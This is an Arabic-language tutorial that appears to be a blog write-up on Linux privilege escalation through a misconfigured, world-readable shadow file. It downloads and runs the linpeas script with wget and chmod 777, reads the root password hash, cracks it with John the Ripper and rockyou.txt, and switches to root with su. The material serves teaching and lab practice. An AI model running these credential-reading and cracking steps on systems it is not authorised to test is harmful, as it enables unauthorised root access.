Privilege Esclation (misconfiguration)

السلام عليكم ورحمة الله وبركاته

الحمد لله على جميع نِعمه علينا ما علمنا منها وما لم نعلم حمداً والصلاة والسلام على نبينا محمد اشرف الخلق والمرسلين, اما بعد:
 

مقدمة:

في هذي المقالة راح اشرح لكم تكنيك من تكنيكات رفع الصلاحية على نظام اللينكس وفي هذا التكنيك راح يعتمد على misconfiguration اللي يسببه مدير السيرفر بحيث انه يلعب في صلاحية ملف حساس ويقدر اي احد يقرأ ذا الملف

خلونا نفهم ايش هو ال misconfiguration :هو الفشل في تنفيذ جميع ضوابط الأمان لخادم أو تطبيق ويب ، أو تنفيذ ضوابط الأمان ، ولكن القيام بذلك مع وجود أخطاء

الشرح:

كالعادة انا داخل بيوزر test ونبي نوصل الى صلاحية root

اللحين راح نستخدم اداة linpease هذا الاداة تبحث لك عن اشياء ممكن انه عن طريقها ترفع صلاحيتك

هذا رابط الاداة للي وده ينزلها:

linpease

نحن طبعا راح ننزلها في مسار tmp/ 

طيب ايش امر التنزيل هذا هو: 

wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh 

بعد كذا راح نعطي الملف صلاحيه وبعدها نشغله امر اعطاء الصلاحية والتشغيل هو :

chmod 777 linpease.sh

linpease.sh/.

طبعا بعد مانقرا النتايج نلاحظ انه نقدر نقرا ملف shadow

طبعا ملف الشادو يعتبر حساس لانه يحتوي على الباسوردات الخاصة باليوزرات بس انها مشفرة

اللي يهمنا باسورد الرووت لانه اعلى صلاحية على النظام زي ما انتوا عارفين

طيب راح ننشئ ملف ونحط فيه السطر كامل انا سويت ملف اسمه hash 

بعد كذا راح نسوي كراك للهاش عن طريق اداة john واتوقع الاغلب منكم يعرفها او سمع عنها 

طيب ايش الامر اللي راح نكتبه ؟

هذا هو الأمر اللي راح نكتبه 

john hash --wordlist=/usr/share/wordlists/rockyou.txt

طبعا في اوبشن ال wordlist راح تحدد مسار لستة الباسوردات اللي انشئتها طبعا انا حاط مسار لستة موجودة بالكالي 

بعد ماتنتهي الاداة من محاولة كسر الهاش راح ننفذ هذا الأمر عشان يعرض لنا الباسورد اللي تم كسره

john hash --show

هذا هو الباسورد الخاص بيوزر root اللي هو : 123

بعد كذا راح ننفذ هذا الامر عشان ندخل على يوزر root

su root

بعد تنفيذ هذا الامر راح يطلب الباس راح تعطيه الباس اللي اللي تم كسره وبكذا نكون اعلى صلاحيه على النظام